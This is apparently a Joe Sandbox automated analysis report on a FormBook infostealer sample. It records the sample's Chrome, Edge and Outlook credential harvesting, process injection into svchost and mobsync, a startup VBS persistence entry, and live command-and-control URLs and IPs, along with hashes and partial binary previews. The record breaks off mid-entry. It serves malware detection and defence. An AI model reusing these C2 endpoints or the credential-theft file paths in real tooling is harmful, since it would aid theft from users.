                    Source: Yara matchFile source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                    Source: fricandeaus.exeBinary or memory string: WIN_81
                    Source: fricandeaus.exeBinary or memory string: WIN_XP
                    Source: fricandeaus.exeBinary or memory string: WIN_XPe
                    Source: fricandeaus.exeBinary or memory string: WIN_VISTA
                    Source: fricandeaus.exeBinary or memory string: WIN_7
                    Source: fricandeaus.exeBinary or memory string: WIN_8
                    Source: fricandeaus.exe.5.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.1903592884.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1865888843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2542862112.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2539169522.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866274601.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1866670350.0000000004150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2543006411.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.2542692952.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2542858222.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C66283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00C66283
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C66747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00C66747
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00166283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,7_2_00166283
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00166747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,7_2_00166747

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting                    		2
                    Valid Accounts                    		2
                    Native API                    		111
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		4
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		NTDS117
                    System Information Discovery                    		Distributed Component Object Model21
                    Input Capture                    		4
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		LSA Secrets251
                    Security Software Discovery                    		SSH3
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                    Process Injection                    		1
                    Masquerading                    		Cached Domain Credentials3
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items2
                    Registry Run Keys / Startup Folder                    		2
                    Valid Accounts                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
                    Virtualization/Sandbox Evasion                    		Proc Filesystem11
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588079 Sample: 25Lz840Dmh.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 44 www.medicaresbasics.xyz 2->44 46 www.meliorahomes.net 2->46 48 4 other IPs or domains 2->48 66 Suricata IDS alerts for network traffic 2->66 68 Antivirus detection for URL or domain 2->68 70 Multi AV Scanner detection for submitted file 2->70 74 6 other signatures 2->74 11 25Lz840Dmh.exe 6 2->11         started        15 wscript.exe 1 2->15         started        signatures3 72 Performs DNS queries to domains with low reputation 44->72 process4 file5 42 C:\Users\user\AppData\...\fricandeaus.exe, PE32 11->42 dropped 80 Binary is likely a compiled AutoIt script file 11->80 17 fricandeaus.exe 3 11->17         started        82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->82 21 fricandeaus.exe 2 15->21         started        signatures6 process7 file8 40 C:\Users\user\AppData\...\fricandeaus.vbs, data 17->40 dropped 54 Multi AV Scanner detection for dropped file 17->54 56 Binary is likely a compiled AutoIt script file 17->56 58 Machine Learning detection for dropped file 17->58 64 2 other signatures 17->64 23 svchost.exe 17->23         started        60 Writes to foreign memory regions 21->60 62 Maps a DLL or memory area into another process 21->62 26 svchost.exe 21->26         started        signatures9 process10 signatures11 78 Maps a DLL or memory area into another process 23->78 28 LHSqcaLVnKQk.exe 23->28 injected process12 signatures13 84 Found direct / indirect Syscall (likely to bypass EDR) 28->84 31 mobsync.exe 13 28->31         started        process14 signatures15 86 Tries to steal Mail credentials (via file / registry access) 31->86 88 Tries to harvest and steal browser information (history, passwords, etc) 31->88 90 Modifies the context of a thread in another process (thread injection) 31->90 92 3 other signatures 31->92 34 LHSqcaLVnKQk.exe 31->34 injected 38 firefox.exe 31->38         started        process16 dnsIp17 50 www.meliorahomes.net 8.217.17.192, 50260, 50261, 50262 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 34->50 52 arcare.partners 3.33.130.190, 50255, 50256, 50257 AMAZONEXPANSIONGB United States 34->52 76 Found direct / indirect Syscall (likely to bypass EDR) 34->76 signatures18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    25Lz840Dmh.exe74%ReversingLabsWin32.Worm.AutoRun
                    25Lz840Dmh.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe74%ReversingLabsWin32.Worm.AutoRun

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.arcare.partners/0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41100%Avira URL Cloudmalware
                    http://www.meliorahomes.net/ir1u/0%Avira URL Cloudsafe
                    http://www.medicaresbasics.xyz/fm31/0%Avira URL Cloudsafe
                    http://www.meliorahomes.net0%Avira URL Cloudsafe
                    http://www.medicaresbasics.xyz/fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ410%Avira URL Cloudsafe
                    http://www.meliorahomes.net/ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ410%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    medicaresbasics.xyz
                    		3.33.130.190
                    		truetrue
                      		unknown
                      arcare.partners
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.meliorahomes.net
                        		8.217.17.192
                        		truetrue
                          		unknown
                          www.resellnexa.shop
                          		unknown
                          		unknownfalse
                            		unknown
                            www.medicaresbasics.xyz
                            		unknown
                            		unknowntrue
                              		unknown
                              www.arcare.partners
                              		unknown
                              		unknownfalse
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://www.medicaresbasics.xyz/fm31/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.meliorahomes.net/ir1u/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.meliorahomes.net/ir1u/?A2jpdtl=uYKfOYzDqyqggai79vqScpm8ne5FVijKNd4332x8Wl1jbLzIat8ECGM70iN++AMSU9cBnLmC3wIu2ItfOOX8692jDlyWN1SxZ5RFi5r2IKL+fn6lY/Px6jUTLMjhswDg2fu7McASOoW2&7pG=BhQ41true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.arcare.partners/0w45/?A2jpdtl=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LRAA95+SEq5JDEdJFd3pplmYx68eY/xBqA0qg2DYtg7eqCiJgDt7nHqi&7pG=BhQ41true
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.medicaresbasics.xyz/fm31/?A2jpdtl=DuLu/ZJEZ0vsa7NMW6Y1luwMsTpUjTiazxiKsFqMjocJmU+Wz0n+SFDwJrBAW4LzJWLZ00ggtR3FlN9GuppGdr/94mhxusDM5hNFGf0PVpNjy7oFhBMR3vaflGDOrcFhaSuJTiwDMWUm&7pG=BhQ41true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtabmobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.meliorahomes.netLHSqcaLVnKQk.exe, 00000012.00000002.2542692952.0000000000BDA000.00000040.80000000.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/newtab/mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=mobsync.exe, 0000000F.00000002.2546113743.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                8.217.17.192
                                                		www.meliorahomes.netSingapore
                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                3.33.130.190
                                                		medicaresbasics.xyzUnited States
                                                		8987AMAZONEXPANSIONGBtrue

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1588079
                                                Start date and time:2025-01-10 21:04:54 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 28s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:20
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:25Lz840Dmh.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:232aba52f171fefbb08cdf88d9fafc571394cf8ec159081d5f9cad2ea2f7669c.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winEXE@14/11@4/2
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 67
                                                • Number of non-executed functions: 271
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: 25Lz840Dmh.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                16:20:34API Interceptor55519x Sleep call for process: mobsync.exe modified
                                                21:05:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                8.217.17.192TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                • www.meliorahomes.net/ir1u/
                                                TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                • www.meliorahomes.net/ir1u/
                                                H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                • www.meliorahomes.net/y4rz/
                                                z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                • www.meliorahomes.net/x0tl/
                                                shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                • www.meliorahomes.net/v6hi/
                                                3.33.130.190WyGagXWAfb.exeGet hashmaliciousFormBookBrowse
                                                • www.virtusign.info/69j2/
                                                bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                • www.ampsamkok88.shop/d5ko/
                                                KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                • www.champs-cloud.systems/kt5b/?SDC=7sHsF0emfu3XBQ/jtFc60bzIUziWjTzDb0qmDF0qYFonYHCCAy09ZYE2TtsqBj+MZwW/uNpm4bfZrR+4SyFJtzDsidCuj5jdbNH0Ax+BPwx+K6LGFw==&mH=CpePy0P
                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • www.emirates-visa.net/lnrv/
                                                janacourse2.1.exeGet hashmaliciousFormBookBrowse
                                                • www.energyecosystem.app/hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE
                                                pbfe2Xcxue.exeGet hashmaliciousPonyBrowse
                                                • onecable.ca/forum/viewtopic.php
                                                RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                • freegeoip.net/xml/
                                                file.exeGet hashmaliciousFormBookBrowse
                                                • www.emi.wtf/gd04/?uvC=N20YWnVHT5RQC6WMyDV2V8c+DcGptM14OKih1BJNLsVd899Y1bUoCinKVTGhqICNh0dB&UlPxR=-Z1dwda8VP90AL
                                                TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                • www.medicaresbasics.xyz/fm31/
                                                236236236.elfGet hashmaliciousUnknownBrowse
                                                • lojasdinastia.com.br/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                www.meliorahomes.netTNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                • 8.217.17.192
                                                TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                • 8.217.17.192
                                                H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                • 8.217.17.192
                                                rInvoiceCM60916_xlx.exeGet hashmaliciousFormBookBrowse
                                                • 8.217.17.192
                                                z1SupplyInvoiceCM60916_Doc.exeGet hashmaliciousFormBookBrowse
                                                • 8.217.17.192
                                                shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                • 8.217.17.192

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AMAZONEXPANSIONGBhttps://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                • 3.33.155.121
                                                WyGagXWAfb.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                • 3.33.130.190
                                                http://www.lpb.gov.lrGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                • 3.33.155.121
                                                https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                • 3.33.220.150
                                                http://www.singhs.lvGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                • 3.33.155.121
                                                http://www.jmclmedia.phGet hashmaliciousUnknownBrowse
                                                • 3.33.148.61
                                                https://sanctionssearch.ofac.treas.govGet hashmaliciousUnknownBrowse
                                                • 108.175.50.40
                                                CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCNWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                • 47.254.140.255
                                                FIWszl1A8l.exeGet hashmaliciousGhostRatBrowse
                                                • 8.217.85.20
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 8.209.177.126
                                                2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                • 8.217.59.222
                                                https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                • 47.254.187.72
                                                Fantazy.sh4.elfGet hashmaliciousUnknownBrowse
                                                • 8.214.203.178
                                                6.elfGet hashmaliciousUnknownBrowse
                                                • 8.222.188.75
                                                Benefit_401k_2025_Enrollment.pdfGet hashmaliciousUnknownBrowse
                                                • 47.246.158.153
                                                123.exeGet hashmaliciousMetasploitBrowse
                                                • 47.90.142.15
                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                • 8.222.72.249

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\25Lz840Dmh.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:modified
                                                Size (bytes):1169920
                                                Entropy (8bit):7.147712317212054
                                                Encrypted:false
                                                SSDEEP:24576:Wu6J33O0c+JY5UZ+XC0kGso6Fa+bh6PgHDpASu6iBf/1RvYB+WY:4u0c++OCvkGs9Fa+b3DSZ6wf/1AY
                                                MD5:6C35B069B37095A1788E5C7B51A60E97
                                                SHA1:3B36EF6C51BB8094729BAE419675A2AA21BC6D23
                                                SHA-256:232ABA52F171FEFBB08CDF88D9FAFC571394CF8EC159081D5F9CAD2EA2F7669C
                                                SHA-512:06E30105A7CEFD397D1C436C9EEC0D477FE505475054CB8E2D8E977E6959FA600DBDC6895C76BBDA330AF742BEC54F0EED477FAA40B869DDA45E41F183C23854
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 74%
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...}vZg.........."..................}............@..........................P....../(....@...@.......@.....................L...|....p..LQ.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...LQ...p...R..................@..@.reloc...q.......r...h..............@..B........................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\aut200B.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):287744
                                                Entropy (8bit):7.993818112232754
                                                Encrypted:true
                                                SSDEEP:6144:5l22Aa7iW5+WkdzGx+sG07RZjrvYtlVVjmVfWL:G2Aa71JkYx+sLlZQjVNL
                                                MD5:FB7D14D5A2FB2B6861ACB237BEA1680A
                                                SHA1:72DC783F910CDB89EDF7814C6DB7F69576D8E1D2
                                                SHA-256:7060C65B49B404945B8157B61AB821A26819F5B496F1D375FA57802B810EE29F
                                                SHA-512:EDCD2C44C353FE4350DE05463B10D2410AFC783E3F2AD63139CCF5C94B8F3C617B78609C815758EB679320A18A4E3EECF7B44A57EEB849CF3CD2F2E3F4EBB92D
                                                Malicious:false
                                                Reputation:low
                                                Preview:.b|d.UA2S...<.....UB...W=...964UA2SM5T5LK8964UA2SM5T5LK896.UA2]R.Z5.B...5....%\'.<9W^DU8aQ2#[;Al)].DA;a[=mq.fl&W]S.XL8wM5T5LK8@7=.|R4..4R.vX^.....i-R./....VS.[....4R..QZ^.5&.SM5T5LK8is4U.3RMq...K8964UA2.M7U>M@89d0UA2SM5T5L.,964EA2S=1T5L.89&4UA0SM3T5LK8962UA2SM5T5<O8944UA2SM7Tu.K8)64EA2SM%T5\K8964UQ2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T.8.@M64U.bWM5D5LKj=64EA2SM5T5LK8964Ua2S-5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964UA2SM5T5LK8964U

                                                C:\Users\user\AppData\Local\Temp\aut2089.tmp

                                                Download File
                                                Process:C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe
                                                File Type:data
                                                Category:dropped
